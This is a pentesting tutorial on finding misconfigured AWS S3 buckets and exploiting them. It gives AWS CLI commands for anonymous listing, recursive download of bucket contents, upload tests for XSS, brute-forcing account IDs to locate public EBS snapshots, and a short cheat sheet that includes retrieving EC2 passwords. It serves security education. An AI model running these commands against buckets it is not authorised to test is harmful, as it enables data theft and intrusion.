AWS S3 for Pentesters

AWS S3 for Pentesters

Discovering and Exploiting Misconfiguration

Introduction

This article is intended for pentesters and security professionals who work with Amazon S3 buckets. It covers methods for discovering buckets, checking access permissions, extracting data, and providing recommendations for securing them. Amazon S3 (Simple Storage Service) is a widely used object storage service for storing and retrieving data. Companies use S3 to store everything from static website content to backup data.

Disclaimer

This material is distributed for educational purposes. The author is not responsible for the misuse of the attack and exploitation methods described in the article. Laboratory data is used as test data and exploitation examples to avoid disclosing third-party data. The described methods apply not only to AWS S3 but also to most services that provide similar data storage capabilities and are compatible with the S3 format.

Overview of S3 Buckets

Amazon S3 is a scalable, high-speed, web-based cloud storage service designed for online backup and archiving of data and application programs. S3 Buckets are containers for objects stored in Amazon S3. Each object is stored in a bucket, and an object consists of a file and optionally any metadata that describes that file.

Uses in Infrastructure:

  • Static Website Hosting: host static websites including HTML, CSS, and JavaScript files;
  • Backup and Restore: store backup copies of their critical data;
  • Data Archiving: storing infrequently accessed data;
  • Big Data Analytics: store and analyze large amounts of data.

A bucket can be created in one of many regions or in several regions at the same time. There are several ways to determine the region of a bucket, for example, by referring to the URL http://aws.s3.amazon.com/<bucket>, and the service will return the address of the bucket with the region ID in the URL in the body of the response and/or in the x-amz-bucket-region header of the response. If access to metadata via the web is restricted/closed and the desired header is missing in the response, you can try using the --region <regionId> option of the AWS CLI client by searching through all the names. Alternatively, you can use public resources that aggregate data from buckets or use off-the-shelf tools for active brute-force searches. Read more about such resources and tools in the section "Pentest S3 Resources".

Configure the Environment

Install the AWS CLI and set up an account. I strongly discourage using AWS administrator IAM credentials. It is better to create a separate account with minimal access rights to S3.

A quick tutorial on how to set up an account:

  1. Open console.aws.amazon.com/iam/home#/policies/create, and go to the JSON tab to add the following permissions:
{
   "Version": "2012-10-17",
   "Statement": [
 	{
   	"Effect": "Allow",
   	"Action": [
     	"s3:GetObject",
     	"s3:ListBucket"
   	],
   	"Resource": [
     	"arn:aws:s3:::*",
     	"arn:aws:s3:::*/*"
   	]
 	}
   ]
 }
  1. Specify the name "S3MinimalAccessPolicy" for the new policy;
  2. Open console.aws.amazon.com/iam/home#/users/create and create a new user (set name like s3-minimal-access);
  3. On the "Set permissions" page, select "Attach existing policies directly" and search for select the previously created policy S3MinimalAccessPolicy
  4. After creating the temp user, you will have access to the "Security Credentials" section. Create access credentials via "Create access key". Save the Access key ID and Secret access key in a secure location or immediately configure the AWS client via run aws configure
  5. Check that the client is configured correctly:
 aws sts get-caller-identity
 {
 	"UserId": "AIDAZQ3DPQMXP6W6BPURI",
 	"Account": "654654276398",
 	"Arn": "arn:aws:iam::654654276398:user/s3-minimal-access"
 }

Pentest S3 Resources

Some services scan the Internet for search of open/available buckets and provide access to them via the web, for example, https://buckets.grayhatwarfare.com/

You can use local tools for brute force by dictionary and mutation searches by sending queries to the bucket provider's endpoints (AWS or whatever):

Remember that buckets can only be hosted/accessible in one of many regions. Pay attention to the `x-amz-bucket-region` header of the response from the service or try to address: `https://s3.amazonaws.com/<bucket_name>` (the response will contain an access error or the name of the region to access the bucket). Once you know the region name, you can check direct access:
`https://<region_name>.s3.amazonaws.com/<bucket_name>`

Misconfigurations

Anonymous Access

This type of misconfiguration occurs when public access is enabled in the bucket settings and access to metadata is not disabled. For example, the resource owner might have intended that certain data be publicly accessible, such as static files for a website (e.g., JS, images, videos, etc.) or archives, using direct links to the files on the site. The misconfiguration happens when the resource owner does not disable anonymous access to the metadata, which contains the bucket’s name and a list of all files in the bucket. You can test for this misconfiguration in the following ways:

curl http://<bucket>.s3.aws.amazon.com/
curl http://s3.aws.amazon.com/<bucket>
aws s3 ls s3://<bucket>/ --no-sign-request
aws s3 ls https://<URL>/ --no-sign-request

The `--no-sign-request` option can be used for a request for data with anonymous access/authorization. In real projects, we have seen buckets with access denied to authorized AWS users, but anonymous access was enabled due to an error in configuring access rights to the resource.

Access with AWS Authorization

The opposite situation to the previous vulnerability is when a resource owner disables anonymous access to the bucket but enables access to all authorized AWS users mistakenly thinking that this applies only to users or employees of their organization. A configured AWS client is sufficient to test and exploit this misconfiguration:

aws s3 ls s3://<domain>/
aws s3 ls https://<domain>/

Access through a Proxy Site

The third type of misconfiguration differs from the previous ones in terms of the connection point. Many resource owners prefer to proxy access to the bucket through their domain/site/server and close direct access for connections. In case of incorrect configuration, access to the contents of the bucket or structure can be gained via metadata. You can use the `--endpoint-url <url>` parameter to check access, for example:

aws s3 ls --endpoint-url http://<site/domain>/<path>  # get the bucket name
aws s3 ls --endpoint-url http://<site/domain>/<path> s3://<bucket>
# don't forget to check with the `--no-sign-request` parameter

This kind of misconfiguration is quite common, and even if you can’t find the name of the bucket, you can try to brute-force possible valid values by dictionary search.

Post Exploitation

Extract the Content from the S3 Bucket

After accessing the bucket and retrieving metadata contents via the AWS CLI, you can run a recursive download of the entire contents or a specific path/file using the following commands:

aws s3 cp s3://<bucket>/ . --recursive
aws s3 cp s3://<bucket>/path/filename .

In addition, you may want to check for the possibility of uploading HTML/JS files to a bucket for XSS attacks or other purposes:

echo 'TEST' > TEST
aws s3 cp TEST s3://<bucket>/TEST
curl http://<region>.s3.aws.amazon.com/<bucket>/TEST

In case the buckets are accessed via a proxy or there are other restrictions for direct access via the AWS CLI, you can send parameters in a GET request to retrieve the data structure:

Get Public Snapshots EBS (Elastic Block Store)

With access to the bucket, we can brute-force the AWS account ID and check for unprotected snapshots. You can read more about this technique in the following blogs:

The following is a copy-paste example for a quick check:

1) Verify that you have a valid AWS account with the root/admin role for creating a temp user:

{
	"UserId": "257143927464",
	"Account": "257143927464",
	"Arn": "arn:aws:iam::257143927464:root"
}

2) Create a new AWS user for your organization:

aws iam create-user --user-name LeakyBucketUser

3) Create a role for the temp user:

aws iam create-role --role-name LeakyBucket --assume-role-policy-document '{
	"Version": "2012-10-17",
	"Statement": [
    	{
        	"Effect": "Allow",
        	"Principal": {
            	"AWS": "arn:aws:iam::257143927464:user/LeakyBucketUser"
        	},
        	"Action": "sts:AssumeRole"
    	}
	]
}'

4) Create a policy with access rights to S3 using the target bucket name and assign it to the temp user:

aws iam put-role-policy --role-name LeakyBucket --policy-name S3AccessPolicy --policy-document '{
	"Version": "2012-10-17",
	"Statement": [
    	{
        	"Effect": "Allow",
        	"Action": [
            	"s3:GetObject",
            	"s3:ListBucket"
        	],
        	"Resource": [
            	"arn:aws:s3:::mega-big-tech",
            	"arn:aws:s3:::mega-big-tech/*"
        	]
    	}
	]
}'
aws iam attach-user-policy --user-name LeakyBucketUser --policy-arn arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

5) Request the access credentials of the created user and configure the profile:

aws iam create-access-key --user-name LeakyBucketUser
aws configure --profile leakybucketuser

6) Install the account ID brute-force tool for the target bucket and run it:

pipx install s3-account-search
aws sts get-caller-identity --profile leakybucketuser
s3-account-search --profile leakybucketuser arn:aws:iam::257143927464:role/LeakyBucket <bucket_name>
> 107513503799

Once we have the account ID, we can proceed to check for public snapshots. To do this, log in to the AWS Management Console and change the region to the region of the target bucket, for example, https://us-east-1.console.aws.amazon.com/ec2/home 

Then, search for the EC2 service, click the service, and in the EC2 dashboard, in the left-hand menu, select Snapshots under the Elastic Block Store menu item. In the dropdown list, select Public Snapshots, paste the discovered AWS account ID into the field, and hit enter.

Or use a direct link by substituting the values: https://us-east-1.console.aws.amazon.com/ec2/home?region=us-east-1#Snapshots:visibility=public;v=3;ownerId=107513503799 

After all manipulations, you can delete the temporary user and associated roles/policies:

aws iam list-attached-user-policies --user-name LeakyBucketUser
aws iam detach-user-policy --user-name LeakyBucketUser --policy-arn "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"
aws iam delete-role-policy --role-name LeakyBucket --policy-name S3AccessPolicy
aws iam delete-role --role-name LeakyBucket
aws iam delete-user --user-name LeakyBucketUser

Cheat Sheet

A small cheat sheet that may be useful in addition to the previous commands/methods:

# Identity and Access Management (IAM)
aws sts get-caller-identity  # whoami
aws iam list-attached-user-policies --user-name contractor  # list attached policies by username
aws iam get-policy --policy-arn arn:aws:iam::427648302155:policy/Policy  # get policy version
aws iam get-policy-version --policy-arn arn:aws:iam::427648302155:policy/Policy --version-id v4  # get policy by version

# Get S3 policy for a bucket
aws s3api get-bucket-policy --bucket <bucket_name>

# Check EC2 instances
aws ec2 describe-instances --filters Name=instance-state-name,Values=running --query 'Reservations[].Instances[].[Tags[?Key==`Name`].Value | [0],InstanceId,Platform,State.Name,PrivateIpAddress,PublicIpAddress,InstanceType,PublicDnsName,KeyName]'

# Get EC2 password
aws ec2 get-password-data --instance-id i-04cc1c2c7ec1af1b5 --priv-launch-key it-admin.pem

Author: @resource_not_found